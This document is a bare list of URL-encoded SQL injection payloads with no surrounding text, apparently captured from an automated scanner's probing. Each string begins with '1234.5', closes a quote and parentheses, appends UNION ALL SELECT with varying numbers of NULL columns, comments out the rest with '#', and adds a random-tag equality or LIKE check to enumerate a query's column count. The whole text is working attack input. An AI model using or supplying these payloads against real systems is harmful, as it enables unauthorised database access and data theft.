1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22UVka%22%3D%22UVka 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22suyw%22%3D%22suyw 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22tpZj%22%3D%22tpZj 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22Uapi%22%3D%22Uapi 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22wfPV%22%3D%22wfPV 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22MZPo%22%3D%22MZPo 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22OKaL%22%3D%22OKaL 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22ABUn%22%3D%22ABUn 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22faaq%22%3D%22faaq 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22HHYT%22%3D%22HHYT 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22wRue%22%3D%22wRue 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22PELB%22%3D%22PELB 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22adKQ%22%3D%22adKQ 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22opvj%22%3D%22opvj 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22iwcu%22%3D%22iwcu 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22Qwoh%22%3D%22Qwoh 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22MkTq%22%3D%22MkTq 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22YPIr%22%3D%22YPIr 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22CGRE%22%3D%22CGRE 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22RbEP%22%3D%22RbEP 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22uDvh%22%3D%22uDvh 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22sOFf%22%3D%22sOFf 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22PRDP%22%3D%22PRDP 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22lzMn%22%3D%22lzMn 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22NSLo%22%3D%22NSLo 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22rPud%22%3D%22rPud 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22xkoA%22%3D%22xkoA 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22hrtx%22%3D%22hrtx 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22pLKm%22%3D%22pLKm 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22khnL%22%3D%22khnL 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22YtCc%22%3D%22YtCc 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22OqoT%22%20LIKE%20%22OqoT 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22JBMu%22%20LIKE%20%22JBMu 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22saZF%22%20LIKE%20%22saZF 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22qgZv%22%20LIKE%20%22qgZv 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22eoLo%22%20LIKE%20%22eoLo 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22bHxj%22%20LIKE%20%22bHxj 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22uJDo%22%20LIKE%20%22uJDo 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22fCTu%22%20LIKE%20%22fCTu 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22cvdI%22%20LIKE%20%22cvdI 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22iRiM%22%20LIKE%20%22iRiM 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22fIdY%22%20LIKE%20%22fIdY 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22ECOX%22%20LIKE%20%22ECOX 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22mGkj%22%20LIKE%20%22mGkj 